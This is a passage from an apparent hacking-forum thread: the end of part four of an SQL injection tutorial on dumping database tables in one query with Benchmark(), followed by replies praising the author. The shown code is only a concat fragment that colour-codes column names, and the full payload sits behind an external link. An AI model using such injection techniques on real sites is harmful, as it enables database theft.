#7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'&lt;font&nbsp;color=green&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">'&lt;/font&gt;'</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;)&nbsp;<br></span></code></div></div></div><br>If column name in actual iteration is same as that stored in <span style="color: #FFD700;">@col_max_name</span> it will be colored red, otherwise green.<br><br>Similar code will be used for displaying tables where least frequently repeated column exists. There we will use variables <span style="color: #FFD700;">@col_min_name</span> and <span style="color: #FFD700;">@tbl_max</span>.<br><br>Final result will be:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/c2d3adfe5402b1830cac232e862f8499.jpg" alt="[Image: c2d3adfe5402b1830cac232e862f8499.jpg]" border="0"><br><br>Complete solution you can find <span style="text-decoration: underline;"><a href="http://pastie.org/private/ahnywf4drupzko6avxec2g#86" target="_blank">here</a></span>.<br><br>In next part #5 I will explain solution to my challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4114967" target="_blank">#97</a></span><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39297951"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506&amp;replyto=39297951" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39300837" id="pid39300837"></a><table class="tborder" style="margin-top: 5px; " id="post_39300837" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-05-2014, 06:16 AM <span id="edited_by_39300837"><span class="smalltext">(This post was last modified: 04-05-2014 06:16 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278">t.pro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;pid=39300837#pid39300837">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 21<br>Posts: 401<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">43</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39300837">Thats what i call logic :)<br><br>great explanaition my friend!...i even dont test the first tutorial (cos of time) but thats the next thing to do for me!<br><br>thx for sharing! great work!</div><div class="post_meta" id="post_meta_39300837"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506&amp;replyto=39300837" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39302393" id="pid39302393"></a><table class="tborder" style="margin-top: 5px; " id="post_39302393" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-05-2014, 07:52 AM <span id="edited_by_39302393"><span class="smalltext">(This post was last modified: 04-05-2014 07:53 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043">makmaniac</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;pid=39302393#pid39302393">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/thumbnail.jpg" alt="" height="95" width="54"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><span class="group2">makmaniac</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 84<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1179043"><strong class="reputation_positive">14</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39302393">so detailed .. best explanation .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"> .. you're no doubt one of the best HQ members here on HF .. Thank you so much for sharing your knowledge .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39302393"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1179043" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506&amp;replyto=39302393" class="bitButton" rel="nofollow">Quote</a> </div></td></tr></tbody></table><a name="pid39308074" id="pid39308074"></a><table class="tborder" style="margin-top: 5px; " id="post_39308074" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-05-2014, 12:34 PM <span id="edited_by_39308074"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;pid=39308074#pid39308074">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <a href="http://www.hackforums.net/online.php" title="Online"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/buddy_online.gif" alt="Online" border="0"></a><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,239<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39308074">t.PRO &amp; makman<br><br>You both are top elite injectors. That is why I am glad for your good feed back about my tutorials.<br><br>I don't get much response lately so I am not sure people read them <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/roflmao.gif" style="vertical-align: middle;" alt="Roflmao" title="Roflmao" border="0"></div><div class="post_meta" id="post_meta_39308074"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506&amp;replyto=39308074" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39309667" id="pid39309667"></a><table class="tborder" style="margin-top: 5px; " id="post_39309667" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-05-2014, 01:56 PM <span id="edited_by_39309667"><span class="smalltext">(This post was last modified: 04-05-2014 02:00 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278">t.pro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;pid=39309667#pid39309667">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 21<br>Posts: 401<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">43</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39309667"><blockquote><cite><span>(04-05-2014 12:34 PM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=39308074#pid39308074" class="quick_jump">►</a></cite>t.PRO &amp; makman<br>You both are top elite injectors. That is why I am glad for your good feed back about my tutorials.</blockquote><br>Thanks for your kind words! Its an honor to hear that from you <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br>We are glad too, to have a mentor like you! For me i can say without your work I would not be where I am <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> ...and our friend MakMan thinks similar - i know!<br><br>It's also nice to see some good people arround here. so its not only about skids and "who is better"<br><br>...so now i stop with being offtopic and i'm sure many people helped that (even without huge response in last time)!</div><div class="post_meta" id="post_meta_39309667"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506&amp;replyto=39309667" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4153506" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4153506">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4153506" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4153506&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4153506.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->